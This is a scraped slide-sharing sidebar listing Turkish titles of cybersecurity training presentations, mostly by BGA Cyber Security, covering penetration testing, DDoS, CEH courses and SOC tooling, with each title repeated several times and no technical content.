Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim Notları
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu Analizi
 
10 Adımda Sızma Testleri
10 Adımda Sızma Testleri10 Adımda Sızma Testleri
10 Adımda Sızma Testleri
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı Simülasyonu
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması Çözümleri
 
Saldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiSaldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log Yönetimi
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 

Destacado

Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiBGA Cyber Security
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yollarınetsec
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugayFuat Ulugay, CISSP
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriBGA Cyber Security
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak DerslerBGA Cyber Security
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyetiBGA Cyber Security
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiBGA Cyber Security
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat UlugayFuat Ulugay, CISSP
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriBGA Cyber Security
 
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriDoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECSosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECBGA Cyber Security
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri BGA Cyber Security
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBGA Cyber Security
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıBGA Cyber Security
 
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiDDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiBGA Cyber Security
 

Destacado (20)

Kablosuz Ağlarda Güvenlik
Kablosuz Ağlarda GüvenlikKablosuz Ağlarda Güvenlik
Kablosuz Ağlarda Güvenlik
 
Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama Güvenliği
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yolları
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
 
BGA Eğitim Sunum
BGA Eğitim SunumBGA Eğitim Sunum
BGA Eğitim Sunum
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyeti
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router Eğitimi
 
Web 2.0 Güvenliği
Web 2.0 GüvenliğiWeb 2.0 Güvenliği
Web 2.0 Güvenliği
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat Ulugay
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
 
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriDoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECSosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma Yolları
 
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiDDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
 
Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
 

Similar a Web Uygulama Pentest Eğitimi

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiBGA Cyber Security
 
Oylg2013 web uygulamalari sizmatesti
Oylg2013 web uygulamalari sizmatestiOylg2013 web uygulamalari sizmatesti
Oylg2013 web uygulamalari sizmatestiMehmet Ince
 
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!Mustafa Özdemir
 
Güvenli Yazılım Geliştirme.pptx
Güvenli Yazılım Geliştirme.pptxGüvenli Yazılım Geliştirme.pptx
Güvenli Yazılım Geliştirme.pptxanilyelken
 
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Securitymtimur
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)BGA Cyber Security
 
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSiber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSparta Bilişim
 
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Onur YILMAZ
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiBGA Cyber Security
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİTulay Candar
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA Cyber Security
 
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunumeroglu
 
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriTalha Kabakus
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...OWASP Turkiye
 
Insaat kursu-cekmekoy
Insaat kursu-cekmekoyInsaat kursu-cekmekoy
Insaat kursu-cekmekoysersld54
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBGA Cyber Security
 

Similar a Web Uygulama Pentest Eğitimi (20)

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
 
Oylg2013 web uygulamalari sizmatesti
Oylg2013 web uygulamalari sizmatestiOylg2013 web uygulamalari sizmatesti
Oylg2013 web uygulamalari sizmatesti
 
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!
Microsoft Azure Sertifikasyon Sınavlarıyla alakalı Bilgi Edinin!
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
Güvenli Yazılım Geliştirme.pptx
Güvenli Yazılım Geliştirme.pptxGüvenli Yazılım Geliştirme.pptx
Güvenli Yazılım Geliştirme.pptx
 
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)
 
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSiber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
 
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09
 
Mobil Pentest Örnek Not
Mobil Pentest Örnek NotMobil Pentest Örnek Not
Mobil Pentest Örnek Not
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) Eğitimi
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
 
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunum
 
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma Yöntemleri
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Emre Kısa - HTTP Güvenlik Başlıkları ...
 
Insaat kursu-cekmekoy
Insaat kursu-cekmekoyInsaat kursu-cekmekoy
Insaat kursu-cekmekoy
 
Ceh egitim
Ceh egitimCeh egitim
Ceh egitim
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
 

Más de BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiBGA Cyber Security
 

Más de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
